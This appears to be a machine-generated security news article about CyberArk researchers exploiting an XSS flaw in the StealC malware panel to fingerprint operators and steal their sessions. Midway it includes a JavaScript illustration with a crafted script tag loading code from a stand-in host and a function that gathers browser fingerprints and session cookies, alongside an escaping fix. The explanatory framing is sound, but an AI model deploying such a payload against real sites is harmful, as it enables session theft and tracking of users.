Ethical Hacking News
CyberArk researchers found a previously unknown cross-site scripting (XSS) flaw in the web control panel used by operators of the StealC info-stealing malware. Exploiting it let them collect browser and hardware fingerprints of the operators, observe active sessions, steal session cookies and hijack panel sessions from their own machines, exposing the hardware and general location of the threat actors behind the panels. One StealC customer, referred to as 'YouTubeTA', was found to have hijacked old YouTube channels to spread the malware, collecting over 5,000 victim logs and some 30 million cookies. CyberArk disclosed the existence of the flaw, though not its details, in the hope of disrupting the StealC malware-as-a-service (MaaS) market and prompting operators to reconsider using the platform.
A recent development sheds light on the inner workings of one of the more widely used info-stealer platforms, StealC. In this article, we look at how researchers were able to hijack the control panel used by operators of the StealC info-stealing malware, exposing information about the attackers' hardware and location.
StealC emerged in early 2023, promoted aggressively on dark web cybercrime channels, and grew in popularity thanks to its evasion features and extensive data theft capabilities. The malware was designed to be highly configurable, allowing operators to tailor it to their needs, which made it an attractive option for many criminals looking to make a profit.
Over the following years, StealC's developer added multiple enhancements, including Telegram bot support and a new builder that generates StealC builds from templates and custom data theft rules. Around this time, the source code for the malware's administration panel was leaked, giving researchers an opportunity to analyze it.
CyberArk researchers then discovered an XSS flaw in the web-based control panel used by StealC operators. The vulnerability allowed them to collect browser and hardware fingerprints of the operators, observe active sessions, steal session cookies from the panel, and hijack panel sessions remotely.
"By exploiting the vulnerability, we were able to identify characteristics of the threat actor's computers, including general location indicators and computer hardware details," the researchers say. "Additionally, we were able to retrieve active session cookies, which allowed us to gain control of sessions from our own machines."
The StealC builder panel (Source: CyberArk)
CyberArk did not disclose specific details about the XSS vulnerability to prevent StealC operators from quickly pinpointing and fixing it.
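Since the real flaw is undisclosed, the following is an added illustration of the bug class rather than CyberArk's exploit or any StealC code. It assumes a hypothetical panel that renders fields reported by infected hosts into an HTML table for the operator: one unescaped field lets a crafted "victim" record deliver a script that runs in the operator's browser with the operator's panel session. The collector origin, the crafted record, the cookie name and the stand-in browser object are all constructed for the example.

```javascript
// Added illustration; not CyberArk's exploit and not StealC's panel code
// (the real flaw's details are not public). Assumed setup: a panel that
// interpolates host-reported fields into HTML viewed by the operator.

// What the panel should do with every untrusted field before interpolation.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable: raw interpolation of attacker-controlled fields (stored XSS).
function renderLogRowVulnerable(rec) {
  return `<tr><td>${rec.hostname}</td><td>${rec.ip}</td><td>${rec.country}</td></tr>`;
}

// Hardened: identical markup, every field escaped.
function renderLogRowSafe(rec) {
  return `<tr><td>${escapeHtml(rec.hostname)}</td>` +
         `<td>${escapeHtml(rec.ip)}</td><td>${escapeHtml(rec.country)}</td></tr>`;
}

// Hypothetical collector origin (not a real endpoint) and a constructed
// "victim" record whose hostname field carries the payload.
const COLLECTOR_URL = "https://collector.example";
const CRAFTED_RECORD = {
  hostname: `<script src="${COLLECTOR_URL}/f.js"></script>`,
  ip: "203.0.113.7", // constructed, documentation range
  country: "US",
};

// Body of that remote script: what it learns about the operator's machine.
// Takes the window object as a parameter so it can run against a stand-in here.
function collectFingerprint(win) {
  const nav = win.navigator;
  let gpu = null;
  try {
    // navigator.platform reads "MacIntel" even on Apple Silicon; the WebGL
    // renderer string is what actually names the chip ("Apple M3" and the like).
    const gl = win.document.createElement("canvas").getContext("webgl");
    const ext = gl && gl.getExtension("WEBGL_debug_renderer_info");
    if (ext) gpu = gl.getParameter(ext.UNMASKED_RENDERER_WEBGL);
  } catch (e) { /* WebGL unavailable */ }
  return {
    platform: nav.platform,
    languages: nav.languages, // e.g. ["en-US", "ru"]
    timeZone: win.Intl.DateTimeFormat().resolvedOptions().timeZone,
    hardwareConcurrency: nav.hardwareConcurrency,
    screen: `${win.screen.width}x${win.screen.height}`,
    gpu,
    // document.cookie never includes HttpOnly cookies: session hijack via XSS
    // only works when the panel's session cookie lacks that flag.
    cookies: win.document.cookie,
  };
}

// Constructed stand-in for the operator's browser (values chosen to mirror the
// kind of findings described in the article; this is not captured data).
function makeOperatorWindow(cookieJar) {
  return {
    navigator: { platform: "MacIntel", languages: ["en-US", "ru"], hardwareConcurrency: 8 },
    screen: { width: 1728, height: 1117 },
    Intl: { DateTimeFormat: () => ({ resolvedOptions: () => ({ timeZone: "Europe/Kyiv" }) }) },
    document: {
      get cookie() {
        return cookieJar.filter((c) => !c.httpOnly).map((c) => `${c.name}=${c.value}`).join("; ");
      },
      createElement: () => ({
        getContext: () => ({
          getExtension: () => ({ UNMASKED_RENDERER_WEBGL: 0x9246 }),
          getParameter: () => "Apple M3",
        }),
      }),
    },
  };
}

// Demo: the crafted row survives the vulnerable renderer, not the hardened one,
// and the payload gets the session cookie only when it is not HttpOnly.
console.log(renderLogRowVulnerable(CRAFTED_RECORD));
console.log(renderLogRowSafe(CRAFTED_RECORD));
console.log(collectFingerprint(makeOperatorWindow([{ name: "sid", value: "0123abcd", httpOnly: false }])));
console.log(collectFingerprint(makeOperatorWindow([{ name: "sid", value: "0123abcd", httpOnly: true }])).cookies);
```

Two practical points follow from this. The collector also sees the source IP of every request the payload makes, which is exactly how an operator who browses the panel without a VPN leaks a real address; and marking the session cookie HttpOnly (plus escaping every host-supplied field) removes the session-hijack half of the attack, though the fingerprint half still works as long as the script executes at all.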
One case that highlights the impact of this vulnerability is that of a StealC customer, referred to as 'YouTubeTA', who hijacked old, legitimate YouTube channels, likely using compromised credentials, and planted links leading to the malware. The cybercriminal ran malware campaigns throughout 2025, collecting over 5,000 victim logs and stealing approximately 390,000 passwords and 30 million cookies (most of them non-sensitive).
Markers page on YouTubeTA's panel (Source: CyberArk)
Screenshots from the threat actor's panel indicate that most infections occurred when victims searched for cracked versions of Adobe Photoshop and Adobe After Effects. By leveraging the XSS flaw, the researchers determined that the attacker used an Apple M3-based system with English and Russian language settings, had an Eastern European time zone configured, and was accessing the internet from Ukraine.
Their location was exposed when the threat actor forgot to route their connection to the StealC panel through a VPN. This revealed their real IP address, which belonged to the Ukrainian ISP TRK Cable TV.
CyberArk notes that malware-as-a-service (MaaS) platforms enable rapid scaling, but also expose the threat actors who use them to significant risk: a flaw in the shared panel affects every operator at once.
BleepingComputer has contacted CyberArk to ask why they chose to disclose the StealC XSS flaw now. Researcher Ari Novick said that they hope to cause disruption to the operation, since there has been "a spike in recent months in the number of StealC operators, possibly in response to the drama around Lumma a couple of months ago."
"By posting the existence of the XSS we hope to cause at least some disruption in the use of the StealC malware, as operators re-evaluate using it. Since there are now relatively many operators, it seemed like a prime opportunity to potentially cause a fairly significant disruption in the MaaS market," Novick said.
In conclusion, the XSS flaw in the StealC control panel highlights the ongoing cat-and-mouse game between security researchers and malicious actors. Criminal tooling is web software like any other and carries the same classes of bugs; a single XSS flaw in a panel that operators log into every day is enough to turn their own browsers into a source of intelligence about them.
Related Information:
https://www.ethicalhackingnews.com/articles/StealC-info-stealing-malwares-control-panel-hacked-by-researchers-exposing-threat-actors-hardware-and-location-ehn.shtml
https://www.bleepingcomputer.com/news/security/stealc-hackers-hacked-as-researchers-hijack-malware-control-panels/
https://thehackernews.com/2025/11/hackers-hijack-blender-3d-assets-to.html
https://dailysecurityreview.com/security-spotlight/stealc-malware-upgraded-with-advanced-data-theft-and-stealth-capabilities/
Published: Fri Jan 16 15:08:13 2026 by llama3.2 3B Q4_K_M